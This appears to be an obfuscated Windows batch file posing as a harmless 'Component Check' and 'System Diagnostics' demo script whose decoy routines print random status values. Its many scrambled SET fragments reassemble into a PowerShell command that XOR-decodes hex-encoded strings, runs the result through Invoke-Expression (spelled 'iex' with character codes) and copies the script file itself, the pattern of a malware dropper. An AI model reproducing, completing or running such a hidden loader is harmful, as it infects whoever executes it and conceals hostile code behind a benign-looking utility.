SET JNFJNFFFDF=DM3TD5V5v9Vx9MCM3C3wDvV5D5u5uv99STSvuC9MCjVv3Tv3SMuw3VVuD5V3D33u
GOTO NODIHOFNGD
:OFGOGINGUD
SET FJOISOOOIJ=MwDjuT5x9w55CxMTuwwwxAjjM5DAxpj5C5Dp9j55xT5595M59AjpSwuMTpx5DpDjpApxSppA
GOTO FOIGDGFSFF
:DOGKGIFGDS2
SET SGIFNIFDGN=39SC99VuwuT9MSVDvSvuwVCSSSVuC93CVCA9p9C3T35SpCA9DS3S9DuCV9MCv
GOTO DOGKGIFGDS3
:KFIOOUNUOG
SET IDISGGSKOD=m1OFuIoJP'';$a9VGl7MV=''3VDv9uCSAp5jMwxT'';$rpJBnO2Vk=''9j9SCD9V9v3D
GOTO NSFDDUIIIO
:IOIIJIFIGS5
SET GIKSDIODDD=xpwpMjM55wjTp5p5Sw5M5TpMuMSxupv5S5vp35p5VTjA9Mvj9M9xxAxMCxvx9AATp5p5SwAwxpxApj
GOTO IOIIJIFIGS6
:GUFGHIIFGO
%HJNIFSOHNJ%%SIGSJKDFGN%%DDDDOFONSN%%IDISGGSKOD%%FDGFIDNFFN%%NDDDODOGNI%%NSDFNISGDO%%NKODOOOSGF%%DOINJHDNGJ%%NJIDFHFKOG%%OODKNSGUNJ%%GNGJGGFDOG%%SGIFNIFDGN%%HIGFNSNOOF%%NNDNGJJOJH%%IFIGFOGFIO%%FNDDNJOJFG%%DGGGIIDGGG%%JIGFSGNNSF%%GGUKJDKGGO%%INIGGGONID%%SSIKHJIDNN%%GOOSGISFJN%%NDNDSOISJN%%GDKDFJOOGG%%GIKSDIODDD%%UONJNGGGGK%%FNOGNOOGOJ%%UFJOSFFIIG%%DJOISIGJFF%%FJOISOOOIJ%%JOGGFIJUGI%%NODDOJGJDS%%OFFONOOIDO%%NIFNNGJODI%%GGOFUKHOOF%%IJNUDNODOJ%%OSOGJNOION%%GFOGFGDJDN%%FNGGIGGFFH%%NODOHJSJGF%%JIJGIJJKFU%%HUIOGJGOFN%%IGGISUNGGI%%GGFDJKSDOG%%JISDDIFFOD%%JOJINNKDJJ%%OJGIDGDGGI%%UNKONDUIIS%%FGJNJJGIIJ%%GISJONUJSD%%JIJFGJNIOO%%OONGODOOUI%%UFIDDJOIDS%%NJJGNDFOHI%%HFNDKFUONN%%OGDOKDHNNG%%KGGGGONFDJ%%JNFJNFFFDF%%IOFNSNDGIG%%DDOIGFGIGS%%GODOFSSDUI%%JFNHNGIFGI%%DFOOJKNGOK%%OJDSNIGOOG%%NFIDDNODDN%%JUIIGDFSOO%%DIJDGIJDGG%%GNDKSJSFFN%%GHNJGFHSDS%%JSIIGJHSOF%%OGDGNFNOIN%%NOGJGDOOOS%%NGJKNDDNFI%%DDFFFFFINO%%SNIOGDDGID%%DSIJIOFUGD%%SGIOINGNJD%%HNOGISNNJS%%NNGDFNSDON%%OGOFIKGSDD%%GDDDFDJNDF%
GOTO OFDNGISFDG3
:GIOODOIOGS
SET NOGJGDOOOS=[$eCdJUq+1]);if($jdeE08bC-ge$gavMZog.Length){$jdeE08bC=0};$nHJ2dw+=[char]
GOTO ONIHKNGJGG
:DOGKGIFGDS8
SET JIGFSGNNSF=AujuuuwuT9TuvvT9SSjujC5Cv9CS5SxCuCDuCuADASA9xuTS3S9DpCj9AC99C
GOTO DOGKGIFGDS9
:GDGIOIJDSG
SET NNGDFNSDON=[char[]](105,101,120)-join'''') $fjB77Bh\"'" ; Copy-Item -Path '%~f0
GOTO NIOGFGJGNG
:FFSNDSOGDD
SET GHNJGFHSDS=4ig[$jdeE08bC]);$jdeE08bC++;$eCdJUq+=2};$ua8qJoqu=$nHJ2dw;$nH
GOTO UDDNGGUIFD0
:FDSIFGGDJH
SET NJJGNDFOHI=DS3vvC39VAVCCxu33DDvCDVxvADA3CvC93uAVAD3VADwvTC5ujux39V9DSVu39DxDSvVSu3MD9u5
GOTO IJOIDDIDDS5
:OIGNGKDGGS
SET NSDFNISGDO=jupu99VSA9Su59uuCSv9VCuu3CDSxS33AvCC99u39SAux9xC3u3DCvxSx9CSx9j
GOTO UDDNGGUIFD
:OIGNGKDGGS8
SET GNDKSJSFFN=-ge$rd1X4ig.Length){$jdeE08bC=0};$nHJ2dw+=[char]($yJEvwYG2-bxor$rd1X
GOTO FFSNDSOGDD
:UJIONSGUNG
SET JIJGIJJKFU=px53wuj55S5SAvpA5Mpwp3pA5SjV5v5pMw'';$otT3XBV=''CDSw9CCMSpuD3
GOTO NSFDDUIIIO2
:NGOSGSIIKG
SET OGDGNFNOIN=wYG2=$a9VGl7MV.IndexOf($sGPzI18[$eCdJUq])*16+$a9VGl7MV.IndexOf($sGPzI18
GOTO GIOODOIOGS
:OIGNGKDGGS6
SET JUIIGDFSOO=e($eCdJUq-lt$rpJBnO2Vk.Length){$yJEvwYG2=$a9VGl7MV.IndexOf($rpJBnO2V
GOTO OGDJDSJSGN
:IJFDGDNJND
SET HJNIFSOHNJ=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Start
GOTO DOGKGIFGDS
:IIGODGDIOO
SET GISJONUJSD=pCp9ASvuD3xSAS5vpvVvvSx3S3AD3Vjv9uxuMCSS99xDCCDDvvTVTDSVDDSVx9MCCS9u
GOTO NFGGDGGGDI
:IOIIJIFIGS0
SET INIGGGONID=uD9SvpSxDwVx9puxST9D9p3VuCVDCD3SCuDx9xuCuVSvuMVx95v9S5CTvVDwSpVxC9SAu9
GOTO IOIIJIFIGS1
:IOFFIJSJGI
SET OONGODOOUI=xuxvvvxvS3uDvvpDwu9DTSpVVVMDDD53w3xvx3DCAupvCvDVvDSS9uT9MC3S
GOTO OGFNSGKNFF
:DOGKGIFGDS6
SET FNDDNJOJFG=STCv95Cj9vup99S9u5vpDDSpC59VuVu99w9uSpuCVvSpDMuCDTSpDCuVuVSx9MuSuj95u9vVSAD
GOTO DOGKGIFGDS7
:DOGKGIFGDS1
SET GNGJGGFDOG=v3uCCVTvA9xD33uDwDDSD9SCT9wu33vvuvjSASxCTCSux9V95uAS5CV3SCSuASpupS
GOTO DOGKGIFGDS2
:NSFDDUIIIO
SET FDGFIDNFFN=S5SD3T9M93SvCu95u5D93Cu3vASMvuu9vSuxDwvMVT3puSSV9xVACVSp9DvwCVS
GOTO IJOIDDIDDS
:ODGDGSDFNI
SET DSIJIOFUGD=VGl7MV.IndexOf($otT3XBV[$eCdJUq+1]);if($jdeE08bC-ge$zxQ0r4aXt.Length)
GOTO UDDNGGUIFD7
:UDDNGGUIFD
SET NKODOOOSGF=up3MvwvA9A93uMvpSC3A9pDASwV53pCwSvuwvSuxCwDv399T3VDAv5CV9CCA9
GOTO OFDNGISFDG
:IOIIJIFIGS4
SET GDKDFJOOGG=vATTVpxj359px5vAVpDT5pCj3jD5CxDATpV59jVT3wujv535DpxpT5pxSATwux9jTj
GOTO IOIIJIFIGS5
:UDDNGGUIFD8
SET HNOGISNNJS=;$eCdJUq+=2};$vgLD1KnP=$nHJ2dw;$fjB77Bh=$ua8qJoqu+$kojswu+$vgLD1KnP;.(
GOTO GDGIOIJDSG
:UDDNGGUIFD0
SET JSIIGJHSOF=J2dw='''';$eCdJUq=0;$jdeE08bC=0;while($eCdJUq-lt$sGPzI18.Length){$yJEv
GOTO NGOSGSIIKG
:NSFDDUIIIO7
SET OJGIDGDGGI=SAuC99V9DV3pDjvCCuuvuwDMVDVDvS9jCDSwVV9pujDwuvuxDj9CSv9j9MCv3jVTDSvxC5
GOTO NSFDDUIIIO8
:DOGKGIFGDS4
SET NNDNGJJOJH=j9Cu53Au39xVMSCSwCAuASS33CSCxSv3SCDuVSASTSSSjuTu59CS99vu3u5CC9pCpC3SjSC9jV9uMup
GOTO DOGKGIFGDS5
:OIGNGKDGGS3
SET DFOOJKNGOK=in [char[]]$mKGbmLPY5){$bfYxBV+=[byte]($d1sCbL8-bxor0xA5)};$gavMZog=$bfYxBV;$b
GOTO GKOFFDFNJO
:NSFDDUIIIO8
SET UNKONDUIIS=Vju5CxDCvADMDS3xVDv3VwvSvMVTVMVTDvvMD9DT35CMDS3VV3vwv9vT3AVDVMvDV9
GOTO ONFISDOFNG
:IOIIJIFIGS9
SET DJOISIGJFF=3xTpSpx5wxVM3ApA3jM5xASj95ST5M5A5TAMA5jwMwpTC5MMSTVxMTuwTMTT9AwT
GOTO OFGOGINGUD
:NSFDDUIIIO2
SET HUIOGJGOFN=CVpDCVDvjuC9jVwvTV53T3uC5DDDA3MD9CjvpDTVpVuv53S33CDDDvx3A9wVxvvDwD33CvMSu
GOTO DJIKGNDIOO
:IJOIDDIDDS
SET NDDDODOGNI=uSDupVM9p9Mu939SVSu9VS9CAD5v3SACC95V5VpDMS3CASMCS9SSpC995V5uS939xVTS39SSD9xVw9
GOTO OIGNGKDGGS
:DOGKGIFGDS9
SET GGUKJDKGGO=CxCwD5D3DASwuu3uuwCjCA9DCDSS3SvDupSASSDDCvuvuD9p3Sup9xSpu5S399uj9puVDDCuSwCVvw
GOTO IOIIJIFIGS0
:OFDNGISFDG
SET DOINJHDNGJ=xCV9Vvwup9VuSCpuDVS9C9CSp9MSMujS9Sp3w3V3VDACMDuS3CA3V93u3CDSM9
GOTO JDGDFIGNOF
:UDDNGGUIFD7
SET SGIOINGNJD={$jdeE08bC=0};$nHJ2dw+=[char]($yJEvwYG2-bxor$zxQ0r4aXt[$jdeE08bC]);$jdeE08bC++
GOTO UDDNGGUIFD8
:OIGNGKDGGS0
SET DDOIGFGIGS=3SV9vxVv933A39vTC9DM33SpSS9vuuSvuC9MCjS995C9SVDw'';$uvewA5pR=0xFA91-0x1
GOTO GONIJNGNGF
:UDDNGGUIFD4
SET DDFFFFFINO=jswu=$nHJ2dw;$nHJ2dw='''';$eCdJUq=0;$jdeE08bC=0;while($eCdJU
GOTO NDNJDFDNFO
:OIGNGKDGGS2
SET JFNHNGIFGI=[byte]($d1sCbL8-bxor0x5A)};$rd1X4ig=$bfYxBV;$bfYxBV=@();foreach($d1sCbL8 
GOTO OIGNGKDGGS3
:IOIIJIFIGS6
SET UONJNGGGGK=wMDj5j35SpCjxjMj959AC59MDpwA5pSpV5Vp5jA5Cx3wVMjpSApjxMD5Sjv5
GOTO IOIIJIFIGS7
:IJOIDDIDDS5
SET HFNDKFUONN=u5CwVSCSuC99V9DV3pDjvCCuuvuwVwv3DSDSvAVxC9uSCvSADwvvuDCwVSC3u59MCTvuu
GOTO FHDIDNIHGG
:OFDNGISFDG3
setlocal EnableDelayedExpansion

echo.

goto :skipCheck

:: ======================================
:: Component Check - DEMO ONLY
:: ======================================

:CheckRoutine
title Component Check
color BE

echo Starting Component Check session...
timeout /t 1 >nul

echo Verifying system components...
timeout /t 1 >nul

for /L %%i in (1,1,3) do (
    set /a percent=!random! %% 100
    echo Component %%i ........ !percent!%%
    timeout /t 1 >nul
)

timeout /t 2 >nul

for %%A in (
    Power
    SATA
    Graphics
    Cooling
) do (
    set /a score=!random! %% 100
    echo %%A Status: !score!%%
)

timeout /t 1 >nul

for %%S in (
    POP3
    FTP
    DHCP
    RDP
) do (
    set /a state=!random! %% 2
    if !state! EQU 0 (
        echo %%S ........ ONLINE
    ) else (
        echo %%S ........ STANDBY
    )
)

echo Scan completed.
pause
goto :eof

:skipCheck
:: ======================================
:: END OF COMPONENT CHECK BLOCK
:: ======================================

goto :skipVerify

:: ======================================
:: System Diagnostics - DEMO ONLY
:: ======================================

:VerifyRoutine
title System Diagnostics
color 3C

echo Starting System Diagnostics session...
timeout /t 1 >nul

echo Verifying system components...
timeout /t 1 >nul

for /L %%i in (1,1,6) do (
    set /a percent=!random! %% 100
    echo Component %%i ........ !percent!%%
    timeout /t 1 >nul
)

echo.
echo Collecting statistics...
timeout /t 2 >nul

for %%A in (
    Cooling
    USB
    Network
    CPU
) do (
    set /a score=!random! %% 100
    echo %%A Status: !score!%%
)

echo Check finished.
pause
goto :eof

:skipVerify
:: ======================================
:: END OF SYSTEM DIAGNOSTICS BLOCK
:: ======================================
